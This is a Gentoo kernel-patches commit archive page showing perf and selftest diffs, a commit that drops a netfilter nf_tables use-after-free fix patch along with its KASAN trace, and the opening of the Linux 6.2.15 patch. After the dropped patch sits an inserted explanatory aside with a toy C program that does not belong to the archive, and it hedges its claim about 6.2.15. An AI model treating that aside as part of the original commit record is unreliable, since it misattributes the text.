++    perf bench sched messaging -g 10 > /dev/null 2>&1
+   then
+     echo "Child task off-cpu test [Failed record]"
+     err=1
+diff --git a/tools/perf/util/Build b/tools/perf/util/Build
+index 79b9498886a20..fa87597398780 100644
+--- a/tools/perf/util/Build
++++ b/tools/perf/util/Build
+@@ -78,7 +78,7 @@ perf-y += pmu-bison.o
+ perf-y += pmu-hybrid.o
+ perf-y += svghelper.o
+ perf-$(CONFIG_LIBTRACEEVENT) += trace-event-info.o
+-perf-$(CONFIG_LIBTRACEEVENT) += trace-event-scripting.o
++perf-y += trace-event-scripting.o
+ perf-$(CONFIG_LIBTRACEEVENT) += trace-event.o
+ perf-$(CONFIG_LIBTRACEEVENT) += trace-event-parse.o
+ perf-$(CONFIG_LIBTRACEEVENT) += trace-event-read.o
+diff --git a/tools/perf/util/cs-etm.c b/tools/perf/util/cs-etm.c
+index 33303d03c2fa4..2f327986090e1 100644
+--- a/tools/perf/util/cs-etm.c
++++ b/tools/perf/util/cs-etm.c
+@@ -2488,26 +2488,29 @@ static int cs_etm__process_auxtrace_event(struct perf_session *session,
+ 	return 0;
+ }
+ 
+-static bool cs_etm__is_timeless_decoding(struct cs_etm_auxtrace *etm)
++static int cs_etm__setup_timeless_decoding(struct cs_etm_auxtrace *etm)
+ {
+ 	struct evsel *evsel;
+ 	struct evlist *evlist = etm->session->evlist;
+-	bool timeless_decoding = true;
+ 
+ 	/* Override timeless mode with user input from --itrace=Z */
+-	if (etm->synth_opts.timeless_decoding)
+-		return true;
++	if (etm->synth_opts.timeless_decoding) {
++		etm->timeless_decoding = true;
++		return 0;
++	}
+ 
+ 	/*
+-	 * Circle through the list of event and complain if we find one
+-	 * with the time bit set.
++	 * Find the cs_etm evsel and look at what its timestamp setting was
+ 	 */
+-	evlist__for_each_entry(evlist, evsel) {
+-		if ((evsel->core.attr.sample_type & PERF_SAMPLE_TIME))
+-			timeless_decoding = false;
+-	}
++	evlist__for_each_entry(evlist, evsel)
++		if (cs_etm__evsel_is_auxtrace(etm->session, evsel)) {
++			etm->timeless_decoding =
++				!(evsel->core.attr.config & BIT(ETM_OPT_TS));
++			return 0;
++		}
+ 
+-	return timeless_decoding;
++	pr_err("CS ETM: Couldn't find ETM evsel\n");
++	return -EINVAL;
+ }
+ 
+ /*
+@@ -2884,7 +2887,6 @@ int cs_etm__process_auxtrace_info_full(union perf_event *event,
+ 	etm->snapshot_mode = (ptr[CS_ETM_SNAPSHOT] != 0);
+ 	etm->metadata = metadata;
+ 	etm->auxtrace_type = auxtrace_info->type;
+-	etm->timeless_decoding = cs_etm__is_timeless_decoding(etm);
+ 
+ 	etm->auxtrace.process_event = cs_etm__process_event;
+ 	etm->auxtrace.process_auxtrace_event = cs_etm__process_auxtrace_event;
+@@ -2894,6 +2896,10 @@ int cs_etm__process_auxtrace_info_full(union perf_event *event,
+ 	etm->auxtrace.evsel_is_auxtrace = cs_etm__evsel_is_auxtrace;
+ 	session->auxtrace = &etm->auxtrace;
+ 
++	err = cs_etm__setup_timeless_decoding(etm);
++	if (err)
++		return err;
++
+ 	etm->unknown_thread = thread__new(999999999, 999999999);
+ 	if (!etm->unknown_thread) {
+ 		err = -ENOMEM;
+diff --git a/tools/perf/util/evsel.h b/tools/perf/util/evsel.h
+index d572be41b9608..2899c97d997cd 100644
+--- a/tools/perf/util/evsel.h
++++ b/tools/perf/util/evsel.h
+@@ -269,6 +269,11 @@ static inline bool evsel__is_bpf(struct evsel *evsel)
+ 	return evsel->bpf_counter_ops != NULL;
+ }
+ 
++static inline bool evsel__is_bperf(struct evsel *evsel)
++{
++	return evsel->bpf_counter_ops != NULL && list_empty(&evsel->bpf_counter_list);
++}
++
+ #define EVSEL__MAX_ALIASES 8
+ 
+ extern const char *const evsel__hw_cache[PERF_COUNT_HW_CACHE_MAX][EVSEL__MAX_ALIASES];
+diff --git a/tools/perf/util/pmu.c b/tools/perf/util/pmu.c
+index 2bdeb89352e7a..be49be366c05c 100644
+--- a/tools/perf/util/pmu.c
++++ b/tools/perf/util/pmu.c
+@@ -1833,7 +1833,7 @@ static int perf_pmu__new_caps(struct list_head *list, char *name, char *value)
+ 	return 0;
+ 
+ free_name:
+-	zfree(caps->name);
++	zfree(&caps->name);
+ free_caps:
+ 	free(caps);
+ 
+diff --git a/tools/perf/util/scripting-engines/Build b/tools/perf/util/scripting-engines/Build
+index 2c96aa3cc1ec8..c220fec970324 100644
+--- a/tools/perf/util/scripting-engines/Build
++++ b/tools/perf/util/scripting-engines/Build
+@@ -1,7 +1,7 @@
+ ifeq ($(CONFIG_LIBTRACEEVENT),y)
+   perf-$(CONFIG_LIBPERL)   += trace-event-perl.o
+-  perf-$(CONFIG_LIBPYTHON) += trace-event-python.o
+ endif
++perf-$(CONFIG_LIBPYTHON) += trace-event-python.o
+ 
+ CFLAGS_trace-event-perl.o += $(PERL_EMBED_CCOPTS) -Wno-redundant-decls -Wno-strict-prototypes -Wno-unused-parameter -Wno-shadow -Wno-nested-externs -Wno-undef -Wno-switch-default -Wno-bad-function-cast -Wno-declaration-after-statement -Wno-switch-enum
+ 
+diff --git a/tools/perf/util/scripting-engines/trace-event-python.c b/tools/perf/util/scripting-engines/trace-event-python.c
+index e930f5f1f36d2..53c32b75c0cab 100644
+--- a/tools/perf/util/scripting-engines/trace-event-python.c
++++ b/tools/perf/util/scripting-engines/trace-event-python.c
+@@ -30,7 +30,9 @@
+ #include <linux/bitmap.h>
+ #include <linux/compiler.h>
+ #include <linux/time64.h>
++#ifdef HAVE_LIBTRACEEVENT
+ #include <traceevent/event-parse.h>
++#endif
+ 
+ #include "../build-id.h"
+ #include "../counts.h"
+@@ -87,18 +89,21 @@ PyMODINIT_FUNC initperf_trace_context(void);
+ PyMODINIT_FUNC PyInit_perf_trace_context(void);
+ #endif
+ 
++#ifdef HAVE_LIBTRACEEVENT
+ #define TRACE_EVENT_TYPE_MAX				\
+ 	((1 << (sizeof(unsigned short) * 8)) - 1)
+ 
+ static DECLARE_BITMAP(events_defined, TRACE_EVENT_TYPE_MAX);
+ 
+-#define MAX_FIELDS	64
+ #define N_COMMON_FIELDS	7
+ 
+-extern struct scripting_context *scripting_context;
+-
+ static char *cur_field_name;
+ static int zero_flag_atom;
++#endif
++
++#define MAX_FIELDS	64
++
++extern struct scripting_context *scripting_context;
+ 
+ static PyObject *main_module, *main_dict;
+ 
+@@ -153,6 +158,26 @@ static PyObject *get_handler(const char *handler_name)
+ 	return handler;
+ }
+ 
++static void call_object(PyObject *handler, PyObject *args, const char *die_msg)
++{
++	PyObject *retval;
++
++	retval = PyObject_CallObject(handler, args);
++	if (retval == NULL)
++		handler_call_die(die_msg);
++	Py_DECREF(retval);
++}
++
++static void try_call_object(const char *handler_name, PyObject *args)
++{
++	PyObject *handler;
++
++	handler = get_handler(handler_name);
++	if (handler)
++		call_object(handler, args, handler_name);
++}
++
++#ifdef HAVE_LIBTRACEEVENT
+ static int get_argument_count(PyObject *handler)
+ {
+ 	int arg_count = 0;
+@@ -181,25 +206,6 @@ static int get_argument_count(PyObject *handler)
+ 	return arg_count;
+ }
+ 
+-static void call_object(PyObject *handler, PyObject *args, const char *die_msg)
+-{
+-	PyObject *retval;
+-
+-	retval = PyObject_CallObject(handler, args);
+-	if (retval == NULL)
+-		handler_call_die(die_msg);
+-	Py_DECREF(retval);
+-}
+-
+-static void try_call_object(const char *handler_name, PyObject *args)
+-{
+-	PyObject *handler;
+-
+-	handler = get_handler(handler_name);
+-	if (handler)
+-		call_object(handler, args, handler_name);
+-}
+-
+ static void define_value(enum tep_print_arg_type field_type,
+ 			 const char *ev_name,
+ 			 const char *field_name,
+@@ -379,6 +385,7 @@ static PyObject *get_field_numeric_entry(struct tep_event *event,
+ 		obj = list;
+ 	return obj;
+ }
++#endif
+ 
+ static const char *get_dsoname(struct map *map)
+ {
+@@ -906,6 +913,7 @@ static PyObject *get_perf_sample_dict(struct perf_sample *sample,
+ 	return dict;
+ }
+ 
++#ifdef HAVE_LIBTRACEEVENT
+ static void python_process_tracepoint(struct perf_sample *sample,
+ 				      struct evsel *evsel,
+ 				      struct addr_location *al,
+@@ -1037,6 +1045,16 @@ static void python_process_tracepoint(struct perf_sample *sample,
+ 
+ 	Py_DECREF(t);
+ }
++#else
++static void python_process_tracepoint(struct perf_sample *sample __maybe_unused,
++				      struct evsel *evsel __maybe_unused,
++				      struct addr_location *al __maybe_unused,
++				      struct addr_location *addr_al __maybe_unused)
++{
++	fprintf(stderr, "Tracepoint events are not supported because "
++			"perf is not linked with libtraceevent.\n");
++}
++#endif
+ 
+ static PyObject *tuple_new(unsigned int sz)
+ {
+@@ -1967,6 +1985,7 @@ static int python_stop_script(void)
+ 	return 0;
+ }
+ 
++#ifdef HAVE_LIBTRACEEVENT
+ static int python_generate_script(struct tep_handle *pevent, const char *outfile)
+ {
+ 	int i, not_first, count, nr_events;
+@@ -2157,6 +2176,18 @@ static int python_generate_script(struct tep_handle *pevent, const char *outfile
+ 
+ 	return 0;
+ }
++#else
++static int python_generate_script(struct tep_handle *pevent __maybe_unused,
++				  const char *outfile __maybe_unused)
++{
++	fprintf(stderr, "Generating Python perf-script is not supported."
++		"  Install libtraceevent and rebuild perf to enable it.\n"
++		"For example:\n  # apt install libtraceevent-dev (ubuntu)"
++		"\n  # yum install libtraceevent-devel (Fedora)"
++		"\n  etc.\n");
++	return -1;
++}
++#endif
+ 
+ struct scripting_ops python_scripting_ops = {
+ 	.name			= "Python",
+diff --git a/tools/perf/util/sort.c b/tools/perf/util/sort.c
+index 37662cdec5eef..22808643ab725 100644
+--- a/tools/perf/util/sort.c
++++ b/tools/perf/util/sort.c
+@@ -603,12 +603,7 @@ static char *hist_entry__get_srcfile(struct hist_entry *e)
+ static int64_t
+ sort__srcfile_cmp(struct hist_entry *left, struct hist_entry *right)
+ {
+-	if (!left->srcfile)
+-		left->srcfile = hist_entry__get_srcfile(left);
+-	if (!right->srcfile)
+-		right->srcfile = hist_entry__get_srcfile(right);
+-
+-	return strcmp(right->srcfile, left->srcfile);
++	return sort__srcline_cmp(left, right);
+ }
+ 
+ static int64_t
+@@ -971,8 +966,7 @@ static int hist_entry__dso_to_filter(struct hist_entry *he, int type,
+ static int64_t
+ sort__sym_from_cmp(struct hist_entry *left, struct hist_entry *right)
+ {
+-	struct addr_map_symbol *from_l = &left->branch_info->from;
+-	struct addr_map_symbol *from_r = &right->branch_info->from;
++	struct addr_map_symbol *from_l, *from_r;
+ 
+ 	if (!left->branch_info || !right->branch_info)
+ 		return cmp_null(left->branch_info, right->branch_info);
+diff --git a/tools/perf/util/symbol-elf.c b/tools/perf/util/symbol-elf.c
+index 96767d1b3f1c2..714fd9d0b51ef 100644
+--- a/tools/perf/util/symbol-elf.c
++++ b/tools/perf/util/symbol-elf.c
+@@ -581,7 +581,7 @@ static int elf_read_build_id(Elf *elf, void *bf, size_t size)
+ 				size_t sz = min(size, descsz);
+ 				memcpy(bf, ptr, sz);
+ 				memset(bf + sz, 0, size - sz);
+-				err = descsz;
++				err = sz;
+ 				break;
+ 			}
+ 		}
+diff --git a/tools/perf/util/trace-event-scripting.c b/tools/perf/util/trace-event-scripting.c
+index 56175c53f9af7..bd0000300c774 100644
+--- a/tools/perf/util/trace-event-scripting.c
++++ b/tools/perf/util/trace-event-scripting.c
+@@ -9,7 +9,9 @@
+ #include <stdlib.h>
+ #include <string.h>
+ #include <errno.h>
++#ifdef HAVE_LIBTRACEEVENT
+ #include <traceevent/event-parse.h>
++#endif
+ 
+ #include "debug.h"
+ #include "trace-event.h"
+@@ -27,10 +29,11 @@ void scripting_context__update(struct scripting_context *c,
+ 			       struct addr_location *addr_al)
+ {
+ 	c->event_data = sample->raw_data;
++	c->pevent = NULL;
++#ifdef HAVE_LIBTRACEEVENT
+ 	if (evsel->tp_format)
+ 		c->pevent = evsel->tp_format->tep;
+-	else
+-		c->pevent = NULL;
++#endif
+ 	c->event = event;
+ 	c->sample = sample;
+ 	c->evsel = evsel;
+@@ -122,6 +125,7 @@ void setup_python_scripting(void)
+ }
+ #endif
+ 
++#ifdef HAVE_LIBTRACEEVENT
+ static void print_perl_unsupported_msg(void)
+ {
+ 	fprintf(stderr, "Perl scripting not supported."
+@@ -186,3 +190,4 @@ void setup_perl_scripting(void)
+ 	register_perl_scripting(&perl_scripting_ops);
+ }
+ #endif
++#endif
+diff --git a/tools/perf/util/tracepoint.c b/tools/perf/util/tracepoint.c
+index 89ef56c433110..92dd8b455b902 100644
+--- a/tools/perf/util/tracepoint.c
++++ b/tools/perf/util/tracepoint.c
+@@ -50,6 +50,7 @@ int is_valid_tracepoint(const char *event_string)
+ 				 sys_dirent->d_name, evt_dirent->d_name);
+ 			if (!strcmp(evt_path, event_string)) {
+ 				closedir(evt_dir);
++				put_events_file(dir_path);
+ 				closedir(sys_dir);
+ 				return 1;
+ 			}
+diff --git a/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh b/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
+index aebaab8ce44cb..441eededa0312 100755
+--- a/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
++++ b/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
+@@ -292,6 +292,11 @@ setup_hs()
+ 	ip netns exec ${hsname} sysctl -wq net.ipv6.conf.all.accept_dad=0
+ 	ip netns exec ${hsname} sysctl -wq net.ipv6.conf.default.accept_dad=0
+ 
++	# disable the rp_filter otherwise the kernel gets confused about how
++	# to route decap ipv4 packets.
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.default.rp_filter=0
++
+ 	ip -netns ${hsname} link add veth0 type veth peer name ${rtveth}
+ 	ip -netns ${hsname} link set ${rtveth} netns ${rtname}
+ 	ip -netns ${hsname} addr add ${IPv6_HS_NETWORK}::${hs}/64 dev veth0 nodad
+@@ -316,11 +321,6 @@ setup_hs()
+ 	ip netns exec ${rtname} sysctl -wq net.ipv6.conf.${rtveth}.proxy_ndp=1
+ 	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.proxy_arp=1
+ 
+-	# disable the rp_filter otherwise the kernel gets confused about how
+-	# to route decap ipv4 packets.
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.rp_filter=0
+-
+ 	ip netns exec ${rtname} sh -c "echo 1 > /proc/sys/net/vrf/strict_mode"
+ }
+ 
+diff --git a/tools/testing/selftests/netfilter/Makefile b/tools/testing/selftests/netfilter/Makefile
+index 4504ee07be08d..3686bfa6c58d7 100644
+--- a/tools/testing/selftests/netfilter/Makefile
++++ b/tools/testing/selftests/netfilter/Makefile
+@@ -8,8 +8,11 @@ TEST_PROGS := nft_trans_stress.sh nft_fib.sh nft_nat.sh bridge_brouter.sh \
+ 	ipip-conntrack-mtu.sh conntrack_tcp_unreplied.sh \
+ 	conntrack_vrf.sh nft_synproxy.sh rpath.sh
+ 
+-CFLAGS += $(shell pkg-config --cflags libmnl 2>/dev/null || echo "-I/usr/include/libmnl")
+-LDLIBS = -lmnl
++HOSTPKG_CONFIG := pkg-config
++
++CFLAGS += $(shell $(HOSTPKG_CONFIG) --cflags libmnl 2>/dev/null)
++LDLIBS += $(shell $(HOSTPKG_CONFIG) --libs libmnl 2>/dev/null || echo -lmnl)
++
+ TEST_GEN_FILES =  nf-queue connect_close
+ 
+ include ../lib.mk


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-05-11 16:11 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-05-11 16:11 UTC (permalink / raw
  To: gentoo-commits

commit:     c3f96c2db4d8b4e17d3da3137e70679513b988bb
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu May 11 16:11:16 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu May 11 16:11:16 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c3f96c2d

Remove redundant patch

Removed:
1520_nf-tables-make-deleted-anon-sets-inactive.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |   4 -
 ...nf-tables-make-deleted-anon-sets-inactive.patch | 121 ---------------------
 2 files changed, 125 deletions(-)

diff --git a/0000_README b/0000_README
index 025f8570..c1153b54 100644
--- a/0000_README
+++ b/0000_README
@@ -111,10 +111,6 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
-Patch:  1520_fs-enable-link-security-restrictions-by-default.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=c1592a89942e9678f7d9c8030efa777c0d57edab
-Desc:   netfilter: nf_tables: deactivate anonymous set from preparation phase
-
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1520_nf-tables-make-deleted-anon-sets-inactive.patch b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
deleted file mode 100644
index cd75de5c..00000000
--- a/1520_nf-tables-make-deleted-anon-sets-inactive.patch
+++ /dev/null
@@ -1,121 +0,0 @@
-From c1592a89942e9678f7d9c8030efa777c0d57edab Mon Sep 17 00:00:00 2001
-From: Pablo Neira Ayuso <pablo@netfilter.org>
-Date: Tue, 2 May 2023 10:25:24 +0200
-Subject: netfilter: nf_tables: deactivate anonymous set from preparation phase
-
-Toggle deleted anonymous sets as inactive in the next generation, so
-users cannot perform any update on it. Clear the generation bitmask
-in case the transaction is aborted.
-
-The following KASAN splat shows a set element deletion for a bound
-anonymous set that has been already removed in the same transaction.
-
-[   64.921510] ==================================================================
-[   64.923123] BUG: KASAN: wild-memory-access in nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.924745] Write of size 8 at addr dead000000000122 by task test/890
-[   64.927903] CPU: 3 PID: 890 Comm: test Not tainted 6.3.0+ #253
-[   64.931120] Call Trace:
-[   64.932699]  <TASK>
-[   64.934292]  dump_stack_lvl+0x33/0x50
-[   64.935908]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.937551]  kasan_report+0xda/0x120
-[   64.939186]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.940814]  nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.942452]  ? __kasan_slab_alloc+0x2d/0x60
-[   64.944070]  ? nf_tables_setelem_notify+0x190/0x190 [nf_tables]
-[   64.945710]  ? kasan_set_track+0x21/0x30
-[   64.947323]  nfnetlink_rcv_batch+0x709/0xd90 [nfnetlink]
-[   64.948898]  ? nfnetlink_rcv_msg+0x480/0x480 [nfnetlink]
-
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- include/net/netfilter/nf_tables.h |  1 +
- net/netfilter/nf_tables_api.c     | 12 ++++++++++++
- net/netfilter/nft_dynset.c        |  2 +-
- net/netfilter/nft_lookup.c        |  2 +-
- net/netfilter/nft_objref.c        |  2 +-
- 5 files changed, 16 insertions(+), 3 deletions(-)
-
-diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
-index 3ed21d2d56590..2e24ea1d744c2 100644
---- a/include/net/netfilter/nf_tables.h
-+++ b/include/net/netfilter/nf_tables.h
-@@ -619,6 +619,7 @@ struct nft_set_binding {
- };
- 
- enum nft_trans_phase;
-+void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
- void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
- 			      struct nft_set_binding *binding,
- 			      enum nft_trans_phase phase);
-diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
-index 8b6c61a2196cb..59fb8320ab4d7 100644
---- a/net/netfilter/nf_tables_api.c
-+++ b/net/netfilter/nf_tables_api.c
-@@ -5127,12 +5127,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
- 	}
- }
- 
-+void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
-+{
-+	if (nft_set_is_anonymous(set))
-+		nft_clear(ctx->net, set);
-+
-+	set->use++;
-+}
-+EXPORT_SYMBOL_GPL(nf_tables_activate_set);
-+
- void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
- 			      struct nft_set_binding *binding,
- 			      enum nft_trans_phase phase)
- {
- 	switch (phase) {
- 	case NFT_TRANS_PREPARE:
-+		if (nft_set_is_anonymous(set))
-+			nft_deactivate_next(ctx->net, set);
-+
- 		set->use--;
- 		return;
- 	case NFT_TRANS_ABORT:
-diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
-index 274579b1696e0..bd19c7aec92ee 100644
---- a/net/netfilter/nft_dynset.c
-+++ b/net/netfilter/nft_dynset.c
-@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_dynset *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_dynset_destroy(const struct nft_ctx *ctx,
-diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
-index cecf8ab90e58f..03ef4fdaa460b 100644
---- a/net/netfilter/nft_lookup.c
-+++ b/net/netfilter/nft_lookup.c
-@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_lookup *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_lookup_destroy(const struct nft_ctx *ctx,
-diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
-index cb37169608bab..a48dd5b5d45b1 100644
---- a/net/netfilter/nft_objref.c
-+++ b/net/netfilter/nft_objref.c
-@@ -185,7 +185,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_objref_map *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_objref_map_destroy(const struct nft_ctx *ctx,
--- 
-cgit 
-
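The file deleted above can be read past quickly: the same fix was merged upstream as commit c1592a89942e and presumably arrives through the 6.2.15 sources added in the sibling commit. The idea worth retaining is the two-generation activity bitmask: a delete is staged by clearing the object's "next generation" bit during the prepare phase, and an aborted transaction simply sets it back. A compilable toy of that pattern — every name below is illustrative, not the kernel's:

#include <stdio.h>
#include <stdbool.h>

/* Toy model of nf_tables' per-object generation bitmask:
 * bit 0 = active in generation A, bit 1 = active in generation B. */
struct toy_set {
	unsigned int genmask;
};

static unsigned int cur_gen;	/* 0 or 1; a commit would flip it */

static bool active_next(const struct toy_set *s)
{
	return s->genmask & (1u << !cur_gen);
}

static void deactivate_next(struct toy_set *s)	/* prepare phase */
{
	s->genmask &= ~(1u << !cur_gen);
}

static void activate_clear(struct toy_set *s)	/* abort path */
{
	s->genmask |= 1u << !cur_gen;
}

int main(void)
{
	struct toy_set s = { .genmask = 3 };	/* active in both gens */

	deactivate_next(&s);	/* deletion staged for next generation */
	printf("after prepare: next-gen active = %d\n", active_next(&s));
	activate_clear(&s);	/* transaction aborted, undo */
	printf("after abort:   next-gen active = %d\n", active_next(&s));
	return 0;
}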


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-05-11 14:48 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-05-11 14:48 UTC (permalink / raw
  To: gentoo-commits

commit:     eee10f955c1d2689f8bd7ec36ef5d1d76f6d355f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu May 11 14:48:39 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu May 11 14:48:39 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=eee10f95

Linux patch 6.2.15

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1014_linux-6.2.15.patch | 38097 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 38101 insertions(+)

diff --git a/0000_README b/0000_README
index a1325df7..025f8570 100644
--- a/0000_README
+++ b/0000_README
@@ -99,6 +99,10 @@ Patch:  1013_linux-6.2.14.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.14
 
+Patch:  1014_linux-6.2.15.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.15
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1014_linux-6.2.15.patch b/1014_linux-6.2.15.patch
new file mode 100644
index 00000000..030da015
--- /dev/null
+++ b/1014_linux-6.2.15.patch
@@ -0,0 +1,38097 @@
+diff --git a/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml b/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
+index 79c6f8da1319c..b0b95689d78b8 100644
+--- a/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
++++ b/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
+@@ -30,6 +30,7 @@ properties:
+     const: 0
+ 
+   clocks:
++    minItems: 3
+     maxItems: 5
+ 
+   clock-names:
+diff --git a/Makefile b/Makefile
+index 031d40ad0bd9d..9f535df81b033 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 14
++SUBLEVEL = 15
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/omap3-gta04.dtsi b/arch/arm/boot/dts/omap3-gta04.dtsi
+index 87e0ab1bbe957..e0be0fb23f80f 100644
+--- a/arch/arm/boot/dts/omap3-gta04.dtsi
++++ b/arch/arm/boot/dts/omap3-gta04.dtsi
+@@ -612,6 +612,22 @@
+ 	clock-frequency = <100000>;
+ };
+ 
++&mcspi1 {
++	status = "disabled";
++};
++
++&mcspi2 {
++	status = "disabled";
++};
++
++&mcspi3 {
++	status = "disabled";
++};
++
++&mcspi4 {
++	status = "disabled";
++};
++
+ &usb_otg_hs {
+ 	interface-type = <0>;
+ 	usb-phy = <&usb2_phy>;
+diff --git a/arch/arm/boot/dts/qcom-apq8064.dtsi b/arch/arm/boot/dts/qcom-apq8064.dtsi
+index 0da9623ea0849..4133321edad88 100644
+--- a/arch/arm/boot/dts/qcom-apq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-apq8064.dtsi
+@@ -1261,7 +1261,7 @@
+ 			gpu_opp_table: opp-table {
+ 				compatible = "operating-points-v2";
+ 
+-				opp-320000000 {
++				opp-450000000 {
+ 					opp-hz = /bits/ 64 <450000000>;
+ 				};
+ 
+diff --git a/arch/arm/boot/dts/qcom-ipq4019.dtsi b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+index acb08dcf94428..a89a17278a118 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+@@ -426,8 +426,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x40200000 0x40200000 0 0x00100000>,
+-				 <0x82000000 0 0x40300000 0x40300000 0 0x00d00000>;
++			ranges = <0x81000000 0x0 0x00000000 0x40200000 0x0 0x00100000>,
++				 <0x82000000 0x0 0x40300000 0x40300000 0x0 0x00d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm/boot/dts/qcom-ipq8064.dtsi b/arch/arm/boot/dts/qcom-ipq8064.dtsi
+index 7e784b0995da2..1e6eb6773a0b0 100644
+--- a/arch/arm/boot/dts/qcom-ipq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq8064.dtsi
+@@ -1082,8 +1082,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x0fe00000 0x0fe00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x08000000 0x08000000 0 0x07e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x0fe00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x08000000 0x08000000 0x0 0x07e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 35 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1133,8 +1133,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x31e00000 0x31e00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x2e000000 0x2e000000 0 0x03e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x31e00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x2e000000 0x2e000000 0x0 0x03e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 57 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1184,8 +1184,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
